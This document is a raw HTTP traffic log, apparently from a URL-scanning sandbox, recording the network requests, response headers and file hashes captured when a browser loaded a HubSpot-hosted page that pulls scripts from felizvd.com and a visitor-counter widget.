Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
content-length: 2088
cf-ray: 74ab54888a67b52d-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 21163
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="logo-fitbit-01.webp"
etag: "550dec525dbee69d80c98a38027d6632"
last-modified: Tue, 14 May 2019 15:32:26 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 dfc1931cc62ecd4133c2b9bdae1bb476.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-6589324599,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=6233
edge-cache-tag: F-6589324599,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: eQLJAmFzguPdEXKsrpHLsy5eEvzoxlLOlodxrOQcPxI4P3684cqPmw==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2088
Md5:    c3670ba0b7439b0f226113351eaea7cc
Sha1:   1b2e2724370323192c04714a46459e8c547b34c9
Sha256: 81b5ba6fe680add910fbc5cb54ded0927c7877427222f80fb1d2fb87b6b47ced
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/poppins/v20/pxiEyp8kv8JHgFVrJJfecg.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 7884
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Sep 2022 19:32:09 GMT
expires: Thu, 07 Sep 2023 19:32:09 GMT
cache-control: public, max-age=31536000
age: 602527
last-modified: Wed, 27 Apr 2022 17:03:52 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7884, version 1.0\012- data
Size:   7884
Md5:    9212f6f9860f9fc6c69b02fedf6db8c3
Sha1:   ac6d71b4d5fdd2b3dabc9a06ff6c001e4251da0b
Sha256: 7d93459d86585bfcdbb7e0376056226adb25821ee54b96236fe2123e9560929f
                                        
                                            GET /s/poppins/v20/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 8000
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Sep 2022 19:30:59 GMT
expires: Thu, 07 Sep 2023 19:30:59 GMT
cache-control: public, max-age=31536000
age: 602597
last-modified: Wed, 27 Apr 2022 16:59:07 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 8000, version 1.0\012- data
Size:   8000
Md5:    72993dddf88a63e8f226656f7de88e57
Sha1:   179f97ec0275f09603a8db94d4380eb584d81cd5
Sha256: f4e80d9dfd374d02989b87a27b5ed4cb78fbb177c27f1478e9a8b0afb7513149
                                        
                                            GET /cms-free-branding-lib/static-1.111/assets/sprocket_white.svg HTTP/1.1 
Host: static.hsappstatic.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/

                                         
                                         104.17.9.210
HTTP/1.1 301 Moved Permanently
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 14 Sep 2022 19:54:16 GMT
Location: https://static.hsappstatic.net/cms-free-branding-lib/static-1.111/assets/sprocket_white.svg
Vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vldfyjbaaQG%2FHQN01106D9609U%2BksFOtIGFIkjFwVt0xJo1%2F0adEzPDB2TkedN72HDlmlEM3nUUL9sabybZ4tDJmDaPq5Y47ExXV3eYzHfKE8IO6PeFWgR%2Bg1MxMB39VJ9nysFzQ69s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 74ab54890fc4fac8-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/poppins/v20/pxiByp8kv8JHgFVrLDz8Z1xlFQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 7840
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 07 Sep 2022 19:31:02 GMT
expires: Thu, 07 Sep 2023 19:31:02 GMT
cache-control: public, max-age=31536000
age: 602594
last-modified: Wed, 27 Apr 2022 16:51:55 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7840, version 1.0\012- data
Size:   7840
Md5:    8d91ec1ca2d8b56640a47117e313a3e9
Sha1:   a9e9bafe64666f4595051a0e895b47a5fa39e67e
Sha256: 78bc3aa78faec288bbb3bf26c9a0fa4eb67b1e69da94a17233c5cab60525efdb
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: MD/cXtRV1BbX/8ONYCGmMg==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         34.214.17.205
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: GwOOAaYO7tTMNxVKJc1i/mlYrSM=

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 14 Sep 2022 18:54:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "01D9ABBA982648F6763DADDE86CC6E4D4673C93D6CE0A5EE0616E508A4854537"
Last-Modified: Wed, 14 Sep 2022 07:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Thu, 15 Sep 2022 00:54:16 GMT
Date: Wed, 14 Sep 2022 18:54:16 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1195
Md5:    9ba0a89d131bdb512efa3898b9a65972
Sha1:   f9703fad64c292259079dbbfa429b3382f8a402e
Sha256: aa9b9808ce15e60d969010326eebeb4a3311a534f447275d4ae7d37f92466ed4
                                        
                                            GET /content-tools-menu/api/v1/tools-menu/has-permission?portalId=26246936&callback=jsonpHandler HTTP/1.1 
Host: app-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.236.181
HTTP/2 204 No Content
                                        
date: Wed, 14 Sep 2022 18:54:16 GMT
cf-ray: 74ab548b4f4f15f4-ARN
cache-control: max-age=0
strict-transport-security: max-age=31536000; includeSubDomains; preload
cf-cache-status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://exceptions.hubspot.com/csp/reports?cfRay=74ab548b4f4f15f4&resource=unknown"}]}
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: 691edde7-9450-4b86-ac7d-35f4e66501fa
x-trace: 2B255F3B911B4599873F8A782212C09DEBF032E4C2000000000000000000
set-cookie: __cf_bm=EUsQkYisNVDSl0RaSRFnSE1rKF8IEP0_NHHld01BRjw-1663181656-0-AZuLkKFWDRURQkkpYdDjqvHarQvqq1hoxukI5w1jlKZBYYJ6HPEEKXD4blxy+FTU41bNgyx0nnPALmJVyyGrTw8=; path=/; expires=Wed, 14-Sep-22 19:24:16 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
vary: Accept-Encoding
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2

                                        
                                            GET /favicon.ico HTTP/1.1 
Host: news4kcnn.hs-sites-eu1.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/

                                         
                                         172.64.154.3
HTTP/1.1 404 Not Found
Content-Type: text/html;charset=utf-8
                                        
Date: Wed, 14 Sep 2022 18:54:17 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 74ab548b09d00afa-OSL
Cache-Control: s-maxage=5,max-age=5
Vary: Accept-Encoding
CF-Cache-Status: MISS
Access-Control-Allow-Credentials: false
X-HS-Reason: No favicon src specified for portal
X-HubSpot-Correlation-Id: 2adc95e9-1860-430d-b4d1-7766bc5c0259
X-HubSpot-NotFound: true
X-Trace: 2B474FD6593D58064ED0F8C598961FCFE7A45E7F5E000000000000000000
Server: cloudflare
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (1351)
Size:   8841
Md5:    13d55e4da1053a25ad8d83581038e63c
Sha1:   dac65ab4c87984b7d0d0c6b2b4ca8299c65d2c8f
Sha256: a2db3d24fb2b615625060ce18996e9653313cb92109b90eade08cc90e946f61f
                                        
                                            GET /?api=1&lan=twthk&ht=2&counter0=cococho01 HTTP/1.1 
Host: felizvd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         159.203.26.69
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 14 Sep 2022 18:54:16 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ek972qtsvoh72qup9np10r5s4r; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (63717), with CRLF line terminators
Size:   512222
Md5:    6e3f46d32347b09c3400e7ba5a35e2b9
Sha1:   78ff982e7ee593ec072205235f32ea9261b078e8
Sha256: 68e207154c227dddaa31a4acb7d58296dc2a2e981650bc8f9385f22ed0cfd279
                                        
                                            GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=931822577&v=1.1&a=26246936&pi=53117545672&ct=standard-page&ccu=http%3A%2F%2Fnews4kcnn.hs-sites-eu1.com&cpi=53117545672&lpi=53117545672&lvi=53117545672&pu=http%3A%2F%2Fnews4kcnn.hs-sites-eu1.com%2F&t=news+private&cts=1663181642945&vi=273058360422436e2d4b8a10fc5ce748&nc=true&u=205882892.273058360422436e2d4b8a10fc5ce748.1663181642943.1663181642943.1663181642943.1&b=205882892.1.1663181642943&cc=15 HTTP/1.1 
Host: track-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.240.166
HTTP/2 200 OK
content-type: image/gif
                                        
date: Wed, 14 Sep 2022 18:54:17 GMT
content-length: 45
cf-ray: 74ab548dfe9315e0-ARN
accept-ranges: bytes
cache-control: no-cache, no-store, no-transform
last-modified: Wed, 14 Sep 2022 18:54:17 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
cf-cache-status: MISS
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-hubspot-correlation-id: 9ab1c3bc-33ab-4211-8f48-066b62c886ce
x-robots-tag: none
set-cookie: __cf_bm=m140rDQYUc8Kw6NwPBDYPDYmYlV9raYFfH3OKDSzR9E-1663181657-0-AUYBWpQszEhDEhcVe8dxRtgviB45kPXoeQDQgct0ndhpcl5q585LZmclDdb/dPk1bL7p9i1REDtThIfWQkXMqPk=; path=/; expires=Wed, 14-Sep-22 19:24:17 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z3rIwfNq0%2BF9hNixYog8%2BnMp3NYfTi3Oo%2BVbzs2dFnHbrqpmh%2FW%2FmiM9B%2Bz35D5MoI9JxYEOUtijCoRx9J7F%2B0eM6%2FyfTHc77%2FZdwn5DzObx6hhiFbyMEXm9H%2FFhg1KRc6FiCcu3dA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   45
Md5:    c8817d472077ebfc04593c1fa019d32d
Sha1:   e1e86f41c86c7b9cd2e8b76c6a925a1a3e7e3247
Sha256: dc111a70984a9eda00752b06277113029ef288f1125c31eff2477413e15e8aa4
                                        
                                            GET /location HTTP/1.1 
Host: felizvd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         159.203.26.69
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx
Date: Wed, 14 Sep 2022 18:54:17 GMT
Content-Length: 237
Connection: keep-alive
Location: https://felizvd.com/location/


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   237
Md5:    0fef66e5d094fd5d91561b9c03320d9e
Sha1:   9c213b1d3b04836b255a65124ad96b4eacd9ab26
Sha256: 78645463804d6b08abadc3b2b83989fc96d69a7855e75fca9deda265c95b9c9b
                                        
                                            GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1 
Host: forms-eu1.hsforms.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.232.43
HTTP/2 200 OK
content-type: image/gif
                                        
date: Wed, 14 Sep 2022 18:54:17 GMT
content-length: 35
x-trace: 2B70B136C3675050E16C7258712A2DD6086AFEC112000000000000000000
cache-control: max-age=0, no-cache, no-store
vary: Accept-Encoding
x-hubspot-correlation-id: f789febe-8f94-41c8-8dd2-b36d9f93a65d
access-control-allow-credentials: false
access-control-expose-headers: X-Origin-Hublet
x-robots-tag: none
cf-cache-status: DYNAMIC
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 74ab548e689d9915-ARN
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   35
Md5:    c2196de8ba412c60c22ab491af7b1409
Sha1:   5fbd472222feb8a22cf5b8aa5dc5b8e13af88e2b
Sha256: 6adc3d4c1056996e4e8b765a62604c78b1f867cceb3b15d0b9bedb7c4857f992
                                        
                                            GET /location/ HTTP/1.1 
Host: felizvd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://news4kcnn.hs-sites-eu1.com/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         159.203.26.69
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 14 Sep 2022 18:54:17 GMT
Content-Length: 468
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   468
Md5:    6f1497d5364a6cfda0e81dd10d409ebf
Sha1:   4db66111b55d4b33203ba3a888e12ba6163cdfdf
Sha256: 3cf8f3dd6ae89d4970edad8007c999d712327c53c1da0998db6f32c7ad99c4e2
                                        
                                            GET /widget/cococho01 HTTP/1.1 
Host: whos.amung.us
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://news4kcnn.hs-sites-eu1.com/

                                         
                                         172.67.8.141
HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=UTF-8
                                        
Date: Wed, 14 Sep 2022 18:54:17 GMT
Transfer-Encoding: chunked
Connection: keep-alive
cache-control: no-cache, no-store, must-revalidate
location: http://widgets.amung.us/classic/00/88.png
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 74ab548f5cf6b509-OSL

                                        
                                            GET /classic/00/88.png HTTP/1.1 
Host: widgets.amung.us
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://news4kcnn.hs-sites-eu1.com/
Connection: keep-alive

                                         
                                         104.22.75.171
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Wed, 14 Sep 2022 18:54:17 GMT
Content-Length: 1436
Connection: keep-alive
last-modified: Sun, 13 Jun 2010 09:03:09 GMT
etag: "4c149ecd-59c"
expires: Mon, 12 Sep 2022 15:39:11 GMT
cache-control: max-age=2678400
access-control-allow-origin: *
CF-Cache-Status: HIT
Age: 270906
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 74ab54905a80991a-ARN


--- Additional Info ---
Magic:  PNG image data, 81 x 29, 8-bit colormap, non-interlaced\012- data
Size:   1436
Md5:    caf28860e0c7d89ea78836e05e93755d
Sha1:   b591ef6584fd6be163f95afab85fb209d6bbb079
Sha256: 76bfd6ca7d85a2ba9cdd79ff28df644c3e75e243222cd10ecf466746eed6dff3
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2194
Expires: Wed, 14 Sep 2022 19:30:51 GMT
Date: Wed, 14 Sep 2022 18:54:17 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2194
Expires: Wed, 14 Sep 2022 19:30:51 GMT
Date: Wed, 14 Sep 2022 18:54:17 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2194
Expires: Wed, 14 Sep 2022 19:30:51 GMT
Date: Wed, 14 Sep 2022 18:54:17 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "EC9DDD9D47E4CD14BD7471042CE3060C1D119038DAC5D1F02A4040C617228B0D"
Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2194
Expires: Wed, 14 Sep 2022 19:30:51 GMT
Date: Wed, 14 Sep 2022 18:54:17 GMT
Connection: keep-alive

                                        
